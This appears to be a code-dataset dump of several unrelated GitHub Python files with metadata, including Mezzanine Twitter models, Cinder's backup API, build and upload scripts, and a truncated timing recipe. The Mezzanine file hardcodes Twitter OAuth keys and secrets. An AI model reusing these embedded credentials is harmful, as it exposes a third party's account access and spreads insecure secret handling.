repo_name
stringlengths
5
92
path
stringlengths
4
221
copies
stringclasses
19 values
size
stringlengths
4
6
content
stringlengths
766
896k
license
stringclasses
15 values
hash
int64
-9,223,277,421,539,062,000
9,223,102,107B
line_mean
float64
6.51
99.9
line_max
int64
32
997
alpha_frac
float64
0.25
0.96
autogenerated
bool
1 class
ratio
float64
1.5
13.6
config_test
bool
2 classes
has_no_keywords
bool
2 classes
few_assignments
bool
1 class
chrisdickinson/multipart
setup.py
1
1572
from distutils.core import setup import os # Stolen from django-registration # Compile the list of packages available, because distutils doesn't have # an easy way to do this. packages, data_files = [], [] root_dir = os.path.dirname(__file__) if root_dir: os.chdir(root_dir) for dirpath, dirnames, filenames in os.walk('multipart'): # Ignore dirnames that start with '.' for i, dirname in enumerate(dirnames): if dirname.startswith('.'): del dirnames[i] if '__init__.py' in filenames: pkg = dirpath.replace(os.path.sep, '.') if os.path.altsep: pkg = pkg.replace(os.path.altsep, '.') packages.append(pkg) elif filenames: prefix = dirpath[13:] # Strip "registration/" or "registration\" for f in filenames: data_files.append(os.path.join(prefix, f)) setup( name='multipart', version='0.1', description='Two helper functions for creating multipart encoded bodies for httplib2', author='Chris Dickinson', author_email='chris.dickinson@domain51.com', url='http://github.com/chrisdickinson/multipart/', packages=packages, package_data={'multipart': data_files}, classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], )
bsd-3-clause
-832,142,934,570,517,000
32.446809
90
0.637405
false
4.030769
false
false
false
agepoly/mezzanine
mezzanine/twitter/models.py
1
6766
from __future__ import unicode_literals from future.builtins import str from datetime import datetime, timedelta import re from time import timezone try: from urllib.parse import quote except ImportError: # Python 2 from urllib import quote from django.db import models from django.utils.encoding import python_2_unicode_compatible from django.utils.html import urlize from django.utils.timezone import get_default_timezone, make_aware from django.utils.translation import ugettext_lazy as _ from requests_oauthlib import OAuth1 import requests from mezzanine.conf import settings from mezzanine.twitter import QUERY_TYPE_CHOICES, QUERY_TYPE_USER, \ QUERY_TYPE_LIST, QUERY_TYPE_SEARCH from mezzanine.twitter import get_auth_settings from mezzanine.twitter.managers import TweetManager re_usernames = re.compile("@([0-9a-zA-Z+_]+)", re.IGNORECASE) re_hashtags = re.compile("#([0-9a-zA-Z+_]+)", re.IGNORECASE) replace_hashtags = "<a href=\"http://twitter.com/search?q=%23\\1\">#\\1</a>" replace_usernames = "<a href=\"http://twitter.com/\\1\">@\\1</a>" class TwitterQueryException(Exception): pass @python_2_unicode_compatible class Query(models.Model): type = models.CharField(_("Type"), choices=QUERY_TYPE_CHOICES, max_length=10) value = models.CharField(_("Value"), max_length=140) interested = models.BooleanField("Interested", default=True) class Meta: verbose_name = _("Twitter query") verbose_name_plural = _("Twitter queries") ordering = ("-id",) def __str__(self): return "%s: %s" % (self.get_type_display(), self.value) def run(self): """ Request new tweets from the Twitter API. """ try: value = quote(self.value) except KeyError: value = self.value urls = { QUERY_TYPE_USER: ("https://api.twitter.com/1.1/statuses/" "user_timeline.json?screen_name=%s" "&include_rts=true" % value.lstrip("@")), QUERY_TYPE_LIST: ("https://api.twitter.com/1.1/lists/statuses.json" "?list_id=%s&include_rts=true" % value), QUERY_TYPE_SEARCH: "https://api.twitter.com/1.1/search/tweets.json" "?q=%s" % value, } try: url = urls[self.type] except KeyError: raise TwitterQueryException("Invalid query type: %s" % self.type) settings.use_editable() auth_settings = get_auth_settings() if not auth_settings: from mezzanine.conf import registry if self.value == registry["TWITTER_DEFAULT_QUERY"]["default"]: # These are some read-only keys and secrets we use # for the default query (eg nothing has been configured) auth_settings = ( "KxZTRD3OBft4PP0iQW0aNQ", "sXpQRSDUVJ2AVPZTfh6MrJjHfOGcdK4wRb1WTGQ", "1368725588-ldWCsd54AJpG2xcB5nyTHyCeIC3RJcNVUAkB1OI", "r9u7qS18t8ad4Hu9XVqmCGxlIpzoCN3e1vx6LOSVgyw3R", ) else: raise TwitterQueryException("Twitter OAuth settings missing") try: tweets = requests.get(url, auth=OAuth1(*auth_settings)).json() except Exception as e: raise TwitterQueryException("Error retrieving: %s" % e) try: raise TwitterQueryException(tweets["errors"][0]["message"]) except (IndexError, KeyError, TypeError): pass if self.type == "search": tweets = tweets["statuses"] for tweet_json in tweets: remote_id = str(tweet_json["id"]) tweet, created = self.tweets.get_or_create(remote_id=remote_id) if not created: continue if "retweeted_status" in tweet_json: user = tweet_json['user'] tweet.retweeter_user_name = user["screen_name"] tweet.retweeter_full_name = user["name"] tweet.retweeter_profile_image_url = user["profile_image_url"] tweet_json = tweet_json["retweeted_status"] if self.type == QUERY_TYPE_SEARCH: tweet.user_name = tweet_json['user']['screen_name'] tweet.full_name = tweet_json['user']['name'] tweet.profile_image_url = \ tweet_json['user']["profile_image_url"] date_format = "%a %b %d %H:%M:%S +0000 %Y" else: user = tweet_json["user"] tweet.user_name = user["screen_name"] tweet.full_name = user["name"] tweet.profile_image_url = user["profile_image_url"] date_format = "%a %b %d %H:%M:%S +0000 %Y" tweet.text = urlize(tweet_json["text"]) tweet.text = re_usernames.sub(replace_usernames, tweet.text) tweet.text = re_hashtags.sub(replace_hashtags, tweet.text) if getattr(settings, 'TWITTER_STRIP_HIGH_MULTIBYTE', False): chars = [ch for ch in tweet.text if ord(ch) < 0x800] tweet.text = ''.join(chars) d = datetime.strptime(tweet_json["created_at"], date_format) d -= timedelta(seconds=timezone) tweet.created_at = make_aware(d, get_default_timezone()) try: tweet.save() except Warning: pass tweet.save() self.interested = False self.save() class Tweet(models.Model): remote_id = models.CharField(_("Twitter ID"), max_length=50) created_at = models.DateTimeField(_("Date/time"), null=True) text = models.TextField(_("Message"), null=True) profile_image_url = models.URLField(_("Profile image URL"), null=True) user_name = models.CharField(_("User name"), max_length=100, null=True) full_name = models.CharField(_("Full name"), max_length=100, null=True) retweeter_profile_image_url = models.URLField( _("Profile image URL (Retweeted by)"), null=True) retweeter_user_name = models.CharField( _("User name (Retweeted by)"), max_length=100, null=True) retweeter_full_name = models.CharField( _("Full name (Retweeted by)"), max_length=100, null=True) query = models.ForeignKey("Query", related_name="tweets") objects = TweetManager() class Meta: verbose_name = _("Tweet") verbose_name_plural = _("Tweets") ordering = ("-created_at",) def __str__(self): return "%s: %s" % (self.user_name, self.text) def is_retweet(self): return self.retweeter_user_name is not None
bsd-2-clause
3,241,061,509,415,992,300
39.035503
79
0.585427
false
3.736057
false
false
false
arcolife/scholarec
corpus/dumps/data_handler.py
1
2830
#!/usr/bin/python import os import sys import json from subprocess import call # path of directory containing all .json files PATH_SOURCE = './data_arxiv_json/' PATH_DEST = './sharded/' def __write_json_files(path_source, path_dest, keyword): ''' Create json chunks from a previous db dump (.json) ''' # load dump data = json.loads(open(path_source+'query_results'+keyword+'.json','rb').read()) for key in data.keys(): temp = data[key] temp['ID'] = key.split('/')[-1] temp['keyword'] = keyword #jEncoder = json.JSONEncoder() f = open(path_dest +temp['ID']+'.json','wb') json.dump(temp, f) f.close() def __write_es_upload_script(path_dest): ''' write content into bash script that is supposed to upload chunks to ElasticSearch instance ''' #list of all json filenames filenames = os.listdir(path_dest) FILE = open('es_upload', 'wb') # write shell commands FILE.write('#!/bin/bash\n') FILE.write('cd ' + path_dest + '\n') for filename in filenames: # develop a command to upload files CMD = ['curl','-XPOST',"'http://localhost:9200/arxiv/docs/" \ #+ filename.strip('.json') \ + "'",'-d ','@'+filename] FILE.write(' '.join(CMD) +"\n") #call(CMD) #print CMD FILE.close() def __write_mongo_upload_script(path_dest): ''' write content into bash script that is supposed to upload chunks to mongodb instance ''' #list of all json filenames filenames = os.listdir(path_dest) FILE = open('mongo_upload', 'wb') # write shell commands FILE.write('#!/bin/bash\n') FILE.write('cd ' + path_dest + ' \n') passw = os.environ.get('mongo_scholarec_p') for filename in filenames: # develop a command to upload files FILE.write('mongoimport --db scholarec -u arco -p ' + passw + ' --collection docs --file '+ \ filename + "\n") #+ filename.strip('.json') \ FILE.close() if __name__=='__main__': ''' try: # creat directory to dump individual json files os.mkdir(PATH_DEST) file_ = open('searchWords.lst', 'rb') import ast keywords = ast.literal_eval(file_.read()) file_.close() for word in keywords: __write_json_files(PATH_SOURCE, PATH_DEST, word) except OSError: print "Error: ", sys.exc_info()[1][1] __write_es_upload_script(PATH_DEST) ''' __write_mongo_upload_script(PATH_DEST) ''' # set executable permission to shell script: ./_User_sharded/post set_perm = ['chmod', '+x', 'es_upload'] call(set_perm) # execute the script and upload json fiels to ES instance call_post = ['./es_upload'] call(call_post) '''
gpl-3.0
-9,152,104,286,490,961,000
30.098901
101
0.579152
false
3.600509
false
false
false
caspahouzer/TiShineLabel
build.py
1
8791
#!/usr/bin/env python # # Appcelerator Titanium Module Packager # # import os, subprocess, sys, glob, string, optparse, subprocess import zipfile from datetime import date cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename)) os.chdir(cwd) required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk'] module_defaults = { 'description':'My module', 'author': 'Your Name', 'license' : 'Specify your license', 'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year), } module_license_default = "TODO: place your license here and we'll include it in the module distribution" def find_sdk(config): sdk = config['TITANIUM_SDK'] return os.path.expandvars(os.path.expanduser(sdk)) def replace_vars(config,token): idx = token.find('$(') while idx != -1: idx2 = token.find(')',idx+2) if idx2 == -1: break key = token[idx+2:idx2] if not config.has_key(key): break token = token.replace('$(%s)' % key, config[key]) idx = token.find('$(') return token def read_ti_xcconfig(): contents = open(os.path.join(cwd,'titanium.xcconfig')).read() config = {} for line in contents.splitlines(False): line = line.strip() if line[0:2]=='//': continue idx = line.find('=') if idx > 0: key = line[0:idx].strip() value = line[idx+1:].strip() config[key] = replace_vars(config,value) return config def generate_doc(config): docdir = os.path.join(cwd,'documentation') if not os.path.exists(docdir): warn("Couldn't find documentation file at: %s" % docdir) return None try: import markdown2 as markdown except ImportError: import markdown documentation = [] for file in os.listdir(docdir): if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)): continue md = open(os.path.join(docdir,file)).read() html = markdown.markdown(md) documentation.append({file:html}); return documentation def compile_js(manifest,config): js_file = os.path.join(cwd,'assets','com.lightapps.TiShineLabel.js') if not os.path.exists(js_file): return from compiler import Compiler try: import json except: import simplejson as json compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs') root_asset, module_assets = compiler.compile_module() root_asset_content = """ %s return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]); """ % root_asset module_asset_content = """ %s NSNumber *index = [map objectForKey:path]; if (index == nil) { return nil; } return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]); """ % module_assets from tools import splice_code assets_router = os.path.join(cwd,'Classes','ComLightappsTiShineLabelModuleAssets.m') splice_code(assets_router, 'asset', root_asset_content) splice_code(assets_router, 'resolve_asset', module_asset_content) # Generate the exports after crawling all of the available JS source exports = open('metadata.json','w') json.dump({'exports':compiler.exports }, exports) exports.close() def die(msg): print msg sys.exit(1) def info(msg): print "[INFO] %s" % msg def warn(msg): print "[WARN] %s" % msg def validate_license(): c = open(os.path.join(cwd,'LICENSE')).read() if c.find(module_license_default)!=-1: warn('please update the LICENSE file with your license text before distributing') def validate_manifest(): path = os.path.join(cwd,'manifest') f = open(path) if not os.path.exists(path): die("missing %s" % path) manifest = {} for line in f.readlines(): line = line.strip() if line[0:1]=='#': continue if line.find(':') < 0: continue key,value = line.split(':') manifest[key.strip()]=value.strip() for key in required_module_keys: if not manifest.has_key(key): die("missing required manifest key '%s'" % key) if module_defaults.has_key(key): defvalue = module_defaults[key] curvalue = manifest[key] if curvalue==defvalue: warn("please update the manifest key: '%s' to a non-default value" % key) return manifest,path ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README'] ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT'] def zip_dir(zf,dir,basepath,ignoreExt=[]): if not os.path.exists(dir): return for root, dirs, files in os.walk(dir): for name in ignoreDirs: if name in dirs: dirs.remove(name) # don't visit ignored directories for file in files: if file in ignoreFiles: continue e = os.path.splitext(file) if len(e) == 2 and e[1] in ignoreExt: continue from_ = os.path.join(root, file) to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1) zf.write(from_, to_) def glob_libfiles(): files = [] for libfile in glob.glob('build/**/*.a'): if libfile.find('Release-')!=-1: files.append(libfile) return files def build_module(manifest,config): from tools import ensure_dev_path ensure_dev_path() rc = os.system("xcodebuild -sdk iphoneos -configuration Release") if rc != 0: die("xcodebuild failed") rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release") if rc != 0: die("xcodebuild failed") # build the merged library using lipo moduleid = manifest['moduleid'] libpaths = '' for libfile in glob_libfiles(): libpaths+='%s ' % libfile os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid)) def generate_apidoc(apidoc_build_path): global options if options.skip_docs: info("Skipping documentation generation.") return False else: info("Module apidoc generation can be skipped using --skip-docs") apidoc_path = os.path.join(cwd, "apidoc") if not os.path.exists(apidoc_path): warn("Skipping apidoc generation. No apidoc folder found at: %s" % apidoc_path) return False if not os.path.exists(apidoc_build_path): os.makedirs(apidoc_build_path) ti_root = string.strip(subprocess.check_output(["echo $TI_ROOT"], shell=True)) if not len(ti_root) > 0: warn("Not generating documentation from the apidoc folder. The titanium_mobile repo could not be found.") warn("Set the TI_ROOT environment variable to the parent folder where the titanium_mobile repo resides (eg.'export TI_ROOT=/Path').") return False docgen = os.path.join(ti_root, "titanium_mobile", "apidoc", "docgen.py") if not os.path.exists(docgen): warn("Not generating documentation from the apidoc folder. Couldn't find docgen.py at: %s" % docgen) return False info("Generating documentation from the apidoc folder.") rc = os.system("\"%s\" --format=jsca,modulehtml --css=styles.css -o \"%s\" -e \"%s\"" % (docgen, apidoc_build_path, apidoc_path)) if rc != 0: die("docgen failed") return True def package_module(manifest,mf,config): name = manifest['name'].lower() moduleid = manifest['moduleid'].lower() version = manifest['version'] modulezip = '%s-iphone-%s.zip' % (moduleid,version) if os.path.exists(modulezip): os.remove(modulezip) zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED) modulepath = 'modules/iphone/%s/%s' % (moduleid,version) zf.write(mf,'%s/manifest' % modulepath) libname = 'lib%s.a' % moduleid zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname)) docs = generate_doc(config) if docs!=None: for doc in docs: for file, html in doc.iteritems(): filename = string.replace(file,'.md','.html') zf.writestr('%s/documentation/%s'%(modulepath,filename),html) apidoc_build_path = os.path.join(cwd, "build", "apidoc") if generate_apidoc(apidoc_build_path): for file in os.listdir(apidoc_build_path): if file in ignoreFiles or os.path.isdir(os.path.join(apidoc_build_path, file)): continue zf.write(os.path.join(apidoc_build_path, file), '%s/documentation/apidoc/%s' % (modulepath, file)) zip_dir(zf,'assets',modulepath,['.pyc','.js']) zip_dir(zf,'example',modulepath,['.pyc']) zip_dir(zf,'platform',modulepath,['.pyc','.js']) zf.write('LICENSE','%s/LICENSE' % modulepath) zf.write('module.xcconfig','%s/module.xcconfig' % modulepath) exports_file = 'metadata.json' if os.path.exists(exports_file): zf.write(exports_file, '%s/%s' % (modulepath, exports_file)) zf.close() if __name__ == '__main__': global options parser = optparse.OptionParser() parser.add_option("-s", "--skip-docs", dest="skip_docs", action="store_true", help="Will skip building documentation in apidoc folder", default=False) (options, args) = parser.parse_args() manifest,mf = validate_manifest() validate_license() config = read_ti_xcconfig() sdk = find_sdk(config) sys.path.insert(0,os.path.join(sdk,'iphone')) sys.path.append(os.path.join(sdk, "common")) compile_js(manifest,config) build_module(manifest,config) package_module(manifest,mf,config) sys.exit(0)
mit
4,717,175,354,227,685,000
30.967273
135
0.694574
false
2.963924
true
false
false
hall1467/wikidata_usage_tracking
python_analysis_scripts/longitudinal_misalignment/alignment_and_misalignment_table_pre_processor.py
1
2373
""" Preprocess alignment and misalignment data so that it can be imported into Postgres Usage: alignment_and_misalignment_table_pre_processor (-h|--help) alignment_and_misalignment_table_pre_processor <output> <input_alignment_data>... [--debug] [--verbose] Options: -h, --help This help message is printed <input_alignment_data> Path to file to process. <output> Where output will be written --debug Print debug logging to stderr --verbose Print dots and stuff to stderr """ import docopt import logging import operator from collections import defaultdict import mysqltsv import bz2 import re from collections import defaultdict import sys logger = logging.getLogger(__name__) MISALIGNMENT_FILE_RE =\ re.compile(r'.*\/(\d\d\d\d\d\d)_misaligned\.tsv') ALIGNMENT_FILE_RE =\ re.compile(r'.*\/(\d\d\d\d\d\d)_aligned\.tsv') def main(argv=None): args = docopt.docopt(__doc__) logging.basicConfig( level=logging.INFO if not args['--debug'] else logging.DEBUG, format='%(asctime)s %(levelname)s:%(name)s -- %(message)s' ) input_alignment_data = args['<input_alignment_data>'] output_file = mysqltsv.Writer(open(args['<output>'], "w")) verbose = args['--verbose'] run(input_alignment_data, output_file, verbose) def run(input_alignment_data, output_file, verbose): for f in input_alignment_data: if verbose: sys.stderr.write("Processing: {0}\n".format(f)) sys.stderr.flush() if MISALIGNMENT_FILE_RE.match(f): date = MISALIGNMENT_FILE_RE.match(f).group(1) file_type = "ma" elif ALIGNMENT_FILE_RE.match(f): date = ALIGNMENT_FILE_RE.match(f).group(1) file_type = "a" else: raise RuntimeError("Incorrect filename: {0}".format(f)) for i, line in enumerate(mysqltsv.Reader(open(f, "r"), headers=False, types=[str, str, str])): output_file.write([line[0], int(date[0:4]), int(date[4:6]), line[2], line[1]]) if verbose and i % 10000 == 0 and i != 0: sys.stderr.write("\tEntities processed: {0}\n".format(i)) sys.stderr.flush() main()
mit
-126,529,642,722,674,400
26.275862
85
0.585335
false
3.62844
false
false
false
NeCTAR-RC/cinder
cinder/backup/api.py
1
11074
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Handles all requests relating to the volume backups service. """ from eventlet import greenthread from oslo.config import cfg from cinder.backup import rpcapi as backup_rpcapi from cinder import context from cinder.db import base from cinder import exception from cinder.openstack.common import log as logging from cinder import utils import cinder.policy import cinder.volume from cinder.volume import utils as volume_utils CONF = cfg.CONF LOG = logging.getLogger(__name__) def check_policy(context, action): target = { 'project_id': context.project_id, 'user_id': context.user_id, } _action = 'backup:%s' % action cinder.policy.enforce(context, _action, target) class API(base.Base): """API for interacting with the volume backup manager.""" def __init__(self, db_driver=None): self.backup_rpcapi = backup_rpcapi.BackupAPI() self.volume_api = cinder.volume.API() super(API, self).__init__(db_driver) def get(self, context, backup_id): check_policy(context, 'get') rv = self.db.backup_get(context, backup_id) return dict(rv.iteritems()) def delete(self, context, backup_id): """Make the RPC call to delete a volume backup.""" check_policy(context, 'delete') backup = self.get(context, backup_id) if backup['status'] not in ['available', 'error']: msg = _('Backup status must be available or error') raise exception.InvalidBackup(reason=msg) self.db.backup_update(context, backup_id, {'status': 'deleting'}) self.backup_rpcapi.delete_backup(context, backup['host'], backup['id']) # TODO(moorehef): Add support for search_opts, discarded atm def get_all(self, context, search_opts=None): if search_opts is None: search_opts = {} check_policy(context, 'get_all') if context.is_admin: backups = self.db.backup_get_all(context) else: backups = self.db.backup_get_all_by_project(context, context.project_id) return backups def _is_backup_service_enabled(self, volume, volume_host): """Check if there is a backup service available.""" topic = CONF.backup_topic ctxt = context.get_admin_context() services = self.db.service_get_all_by_topic(ctxt, topic) for srv in services: if (srv['availability_zone'] == volume['availability_zone'] and srv['host'] == volume_host and not srv['disabled'] and utils.service_is_up(srv)): return True return False def _list_backup_services(self): """List all enabled backup services. :returns: list -- hosts for services that are enabled for backup. """ topic = CONF.backup_topic ctxt = context.get_admin_context() services = self.db.service_get_all_by_topic(ctxt, topic) return [srv['host'] for srv in services if not srv['disabled']] def create(self, context, name, description, volume_id, container, availability_zone=None): """Make the RPC call to create a volume backup.""" check_policy(context, 'create') volume = self.volume_api.get(context, volume_id) if volume['status'] != "available": msg = _('Volume to be backed up must be available') raise exception.InvalidVolume(reason=msg) volume_host = volume_utils.extract_host(volume['host'], 'host') if not self._is_backup_service_enabled(volume, volume_host): raise exception.ServiceNotFound(service_id='cinder-backup') self.db.volume_update(context, volume_id, {'status': 'backing-up'}) options = {'user_id': context.user_id, 'project_id': context.project_id, 'display_name': name, 'display_description': description, 'volume_id': volume_id, 'status': 'creating', 'container': container, 'size': volume['size'], 'host': volume_host, } backup = self.db.backup_create(context, options) #TODO(DuncanT): In future, when we have a generic local attach, # this can go via the scheduler, which enables # better load balancing and isolation of services self.backup_rpcapi.create_backup(context, backup['host'], backup['id'], volume_id) return backup def restore(self, context, backup_id, volume_id=None): """Make the RPC call to restore a volume backup.""" check_policy(context, 'restore') backup = self.get(context, backup_id) if backup['status'] != 'available': msg = _('Backup status must be available') raise exception.InvalidBackup(reason=msg) size = backup['size'] if size is None: msg = _('Backup to be restored has invalid size') raise exception.InvalidBackup(reason=msg) # Create a volume if none specified. If a volume is specified check # it is large enough for the backup if volume_id is None: name = 'restore_backup_%s' % backup_id description = 'auto-created_from_restore_from_backup' LOG.audit(_("Creating volume of %(size)s GB for restore of " "backup %(backup_id)s"), {'size': size, 'backup_id': backup_id}, context=context) volume = self.volume_api.create(context, size, name, description) volume_id = volume['id'] while True: volume = self.volume_api.get(context, volume_id) if volume['status'] != 'creating': break greenthread.sleep(1) else: volume = self.volume_api.get(context, volume_id) if volume['status'] != "available": msg = _('Volume to be restored to must be available') raise exception.InvalidVolume(reason=msg) LOG.debug('Checking backup size %s against volume size %s', size, volume['size']) if size > volume['size']: msg = (_('volume size %(volume_size)d is too small to restore ' 'backup of size %(size)d.') % {'volume_size': volume['size'], 'size': size}) raise exception.InvalidVolume(reason=msg) LOG.audit(_("Overwriting volume %(volume_id)s with restore of " "backup %(backup_id)s"), {'volume_id': volume_id, 'backup_id': backup_id}, context=context) # Setting the status here rather than setting at start and unrolling # for each error condition, it should be a very small window self.db.backup_update(context, backup_id, {'status': 'restoring'}) self.db.volume_update(context, volume_id, {'status': 'restoring-backup'}) self.backup_rpcapi.restore_backup(context, backup['host'], backup['id'], volume_id) d = {'backup_id': backup_id, 'volume_id': volume_id, } return d def export_record(self, context, backup_id): """Make the RPC call to export a volume backup. Call backup manager to execute backup export. :param context: running context :param backup_id: backup id to export :returns: dictionary -- a description of how to import the backup :returns: contains 'backup_url' and 'backup_service' :raises: InvalidBackup """ check_policy(context, 'backup-export') backup = self.get(context, backup_id) if backup['status'] != 'available': msg = (_('Backup status must be available and not %s.') % backup['status']) raise exception.InvalidBackup(reason=msg) LOG.debug("Calling RPCAPI with context: " "%(ctx)s, host: %(host)s, backup: %(id)s.", {'ctx': context, 'host': backup['host'], 'id': backup['id']}) export_data = self.backup_rpcapi.export_record(context, backup['host'], backup['id']) return export_data def import_record(self, context, backup_service, backup_url): """Make the RPC call to import a volume backup. :param context: running context :param backup_service: backup service name :param backup_url: backup description to be used by the backup driver :raises: InvalidBackup :raises: ServiceNotFound """ check_policy(context, 'backup-import') # NOTE(ronenkat): since we don't have a backup-scheduler # we need to find a host that support the backup service # that was used to create the backup. # We send it to the first backup service host, and the backup manager # on that host will forward it to other hosts on the hosts list if it # cannot support correct service itself. hosts = self._list_backup_services() if len(hosts) == 0: raise exception.ServiceNotFound(service_id=backup_service) options = {'user_id': context.user_id, 'project_id': context.project_id, 'volume_id': '0000-0000-0000-0000', 'status': 'creating', } backup = self.db.backup_create(context, options) first_host = hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup['id'], backup_service, backup_url, hosts) return backup
apache-2.0
-4,439,977,846,825,401,300
39.123188
78
0.559689
false
4.503457
false
false
false
zestedesavoir/Python-ZMarkdown
zmarkdown/extensions/urlize.py
1
2230
# Inspired by https://github.com/r0wb0t/markdown-urlize/blob/master/urlize.py from __future__ import unicode_literals from zmarkdown.inlinepatterns import Pattern as InlinePattern, sanitize_url, MAIL_RE from zmarkdown import Extension, util try: # pragma: no cover from urllib.parse import urlparse except ImportError: # pragma: no cover from urlparse import urlparse import re # Global Vars. Do not catch ending dot URLIZE_RE = r'(^|(?<=\s))({0})(?=\.?(\s|$))'.format("|".join(( # mail adress (two lines): MAIL_RE, # Anything with protocol between < > r"<(?:f|ht)tps?://[^>]*>", # with protocol : any valid domain match. r"((?:f|ht)tps?://)([\da-z\.-]+)\.([a-z\.]{1,5}[a-z])([/\w\.$%&_?#=()'-]*[/\w$%&_?#=()'-])?\/?", # without protocol, only somes specified protocols match r"((?:f|ht)tps?://)?([\da-z\.-]+)\.(?:com|net|org|fr)([/\w\.$%&_?#=()'-]*[/\w$%&_?#=()'-])?\/?"))) class UrlizePattern(InlinePattern): """ Return a link Element given an autolink (`http://example/com`). """ def __init__(self, *args, **kwargs): kwargs["not_in"] = ('link',) InlinePattern.__init__(self, *args, **kwargs) def handleMatch(self, m): url = m.group(3) if url.startswith('<'): url = url[1:-1] text = url is_url = re.match(MAIL_RE, url) if not is_url: url = sanitize_url(url) parts = urlparse(url) # If no protocol (and not explicit relative link), add one if parts[0] == "": if is_url: url = 'mailto:' + url elif not url.startswith("#") and not url.startswith("/"): url = 'http://' + url el = util.etree.Element("a") el.set('href', url) el.text = util.AtomicString(text) return el class UrlizeExtension(Extension): """ Urlize Extension for Python-Markdown. """ def extendZMarkdown(self, md, md_globals): """ Replace autolink with UrlizePattern """ md.inlinePatterns['autolink'] = UrlizePattern(URLIZE_RE, md) def makeExtension(*args, **kwargs): return UrlizeExtension(*args, **kwargs)
bsd-3-clause
-4,029,473,678,313,161,700
30.794118
102
0.54574
false
3.36858
false
false
false
paritoshsingh/konehack
read_and_send_msg.py
1
2879
#!/usr/bin/python import smbus import math import paho.mqtt.client as mqtt # Power management registers power_mgmt_1 = 0x6b power_mgmt_2 = 0x6c def read_byte(adr): return bus.read_byte_data(address, adr) def read_word(adr): high = bus.read_byte_data(address, adr) low = bus.read_byte_data(address, adr+1) val = (high << 8) + low return val def read_word_2c(adr): val = read_word(adr) if (val >= 0x8000): return -((65535 - val) + 1) else: return val def dist(a,b): return math.sqrt((a*a)+(b*b)) def get_y_rotation(x,y,z): radians = math.atan2(x, dist(y,z)) return -math.degrees(radians) def get_x_rotation(x,y,z): radians = math.atan2(y, dist(x,z)) return math.degrees(radians) # The callback for when the client receives a CONNACK response from the server. def on_connect(client, userdata, flags, rc): print("Connected with result code "+str(rc)) # The callback for when a PUBLISH message is received from the server. def on_message(client, userdata, msg): print(msg.topic+" "+str(msg.payload)) bus = smbus.SMBus(1) # or bus = smbus.SMBus(1) for Revision 2 boards address = 0x68 # This is the address value read via the i2cdetect command # Now wake the 6050 up as it starts in sleep mode bus.write_byte_data(address, power_mgmt_1, 0) while 1: # print "gyro data" # print "---------" gyro_xout = read_word_2c(0x43) gyro_yout = read_word_2c(0x45) gyro_zout = read_word_2c(0x47) print "gyro_xout: ", gyro_xout, " scaled: ", (gyro_xout / 131) print "gyro_yout: ", gyro_yout, " scaled: ", (gyro_yout / 131) print "gyro_zout: ", gyro_zout, " scaled: ", (gyro_zout / 131) # print # print "accelerometer data" # print "------------------" accel_xout = read_word_2c(0x3b) accel_yout = read_word_2c(0x3d) accel_zout = read_word_2c(0x3f) accel_xout_scaled = accel_xout / 16384.0 accel_yout_scaled = accel_yout / 16384.0 accel_zout_scaled = accel_zout / 16384.0 # print "accel_xout: ", accel_xout, " scaled: ", accel_xout_scaled # print "accel_yout: ", accel_yout, " scaled: ", accel_yout_scaled # print "accel_zout: ", accel_zout, " scaled: ", accel_zout_scaled # print "x rotation: " , get_x_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled) # print "y rotation: " , get_y_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled) # Subscribing in on_connect() means that if we lose the connection and # reconnect then subscriptions will be renewed. client.subscribe("$SYS/#") client = mqtt.Client() client.on_connect = on_connect client.on_message = on_message client.connect("iot.eclipse.org", 1883, 60) # Blocking call that processes network traffic, dispatches callbacks and # handles reconnecting. # Other loop*() functions are available that give a threaded interface and a # manual interface. client.loop_forever()
mit
6,383,770,058,486,674,000
27.22549
97
0.674192
false
2.67814
false
false
false
ActiveState/code
recipes/Python/440657_Determine_functiexecutitime_Pythonic/recipe-440657.py
1
2051
""" Determine function execution time. >>> def f(): ... return sum(range(10)) ... >>> pytime(f) (Time to execute function f, including function call overhead). >>> 1.0/pytime(f) (Function calls/sec, including function call overhead). >>> 1.0/pytime_statement('sum(range(10))') (Statements/sec, does not include any function call overhead). """ import sys # Source code is public domain. if sys.platform == "win32": from time import clock else: from time import time as clock def pytime(f, args=(), kwargs={}, Tmax=2.0): """ Calls f many times to determine the average time to execute f. Tmax is the maximum time to spend in pytime(), in seconds. """ count = 1 while True: start = clock() if args == () and kwargs == {}: for i in xrange(count): f() elif kwargs == {}: for i in xrange(count): f(*args) else: for i in xrange(count): f(*args, **kwargs) T = clock() - start if T >= Tmax/4.0: break count *= 2 return T / count def pytime_statement(stmt, global_dict=None, Tmax=2.0, repeat_count=128): """ Determine time to execute statement (or block) of Python code. Here global_dict is the globals dict used for exec, Tmax is the max time to spend in pytime_statement(), in sec, and repeat_count is the number of times to paste stmt into the inner timing loop (this is automatically set to 1 if stmt takes too long). """ if global_dict is None: global_dict = globals() ns = {} code = 'def 